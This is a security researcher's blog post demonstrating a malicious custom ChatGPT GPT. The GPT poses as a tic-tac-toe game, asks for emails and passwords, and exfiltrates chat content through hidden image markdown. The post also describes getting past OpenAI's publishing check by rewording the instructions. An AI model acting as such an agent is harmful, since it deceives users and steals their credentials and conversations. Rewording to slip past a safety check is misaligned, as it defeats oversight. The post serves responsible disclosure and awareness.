Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo)
When OpenAI released GPTs last month I had plans for an interesting GPT.
Malicious ChatGPT Agents
The idea was to create a kind of malware GPT that forwards users' chat messages to a third party server. It also asks users for personal information like emails and passwords.
Why would this be possible end to end?
ChatGPT cannot guarantee to keep your conversation private or confidential, because it loads images from any website. This allows data to be sent to a third party server.
A GPT can contain instructions that ask the user for information and simply send it elsewhere. A demo proof-of-concept GPT was quickly created.
To make it fun, it pretends to be a GPT that wants to play tic-tac-toe with the user.
As you can see above before starting to play it asks for some personal information to ensure a good experience. Unfortunately everything the user shares with this GPT will be secretly sent to a third party server by rendering a hidden image with the data appended to it.
And the server indeed receives the user’s data.
Scary. Watch the video below to see if it also got the user’s password! :)
The final question was if it can be made available to other ChatGPT users?
Publishing Thief GPT!
When creating a GPT it is initially private and can only be used by it’s creator.
There are three publishing settings:
- Only me (private, default)
- Anyone with a link
- Public
This is how the UI looks for publishing a GPT:
When I first switched the setting to “Anyone with Link” or “Public”, I got this error:
OpenAI blocks publishing of certain GPTs. The first version contained words such as “steal” and “malicious” and it apparently failed “brand and usage” guidelines.
Updating Instructions
However, as suggested it was a “quick fix” to modify the definition of the GPT to pass these checks. I think just changing any few characters might at times bypass the checks. I’m pretty sure it uses an LLM to validate the instructions, so by pure chance dubios instructions might pass this check. Afterwards, it was published for anyone to use!
There is a note that the GPT might appear in the GPT store (when making it fully public):
Automatic malware proliferation! Scary!
To prevent the GPT showing up in the store I changed the setting back to “Anyone with link”.
Demo Video
If you read that far I’m sure you want to see the demo:
Malicious Agents can scam users, ask for personal information and also exfiltrate information.
This should be pretty alarming.
Disclosure
This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as “Not Applicable”. Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness.
The data exfiltration technique used by the GPT (rendering hidden image markdown) was first reported to OpenAI early April 2023.
Conclusions
There are security vulnerabilities in ChatGPT, including GPTs, that remain unaddressed:
- GPTs can be designed as malicious agents that try to scam users
- GPTs can steal user data by exfiltrating it to external servers without the users’s knowledge or consent
- Bypassing the current validation checks is trivial, allowing anyone to publish malicious GPTs to the world.
Because of the image markdown rendering vulnerability, OpenAI cannot guarantee the privacy and confidentiality of your ChatGPT conversations. This includes, but is not limited to custom GPTs.
Bing Chat, Google Bard, Anthropic Claude and many others fixed such issues after being made aware of them. Let’s hope fixes get implemented, so we can safely enjoy using GPTs.
Chaos Communication Congress
I will be at the 37th Chaos Communication Congress in Hamburg speaking about security issues in LLM applications to raise awareness of emerging attack techniques and what can be done to mitigate them.
Come by and check out the talk, it’s called “NEW IMPORTANT INSTRUCTIONS”.
That’s it for today. Thanks for reading.
Appendix
Demo Screenshot
Here are some demo screenshots: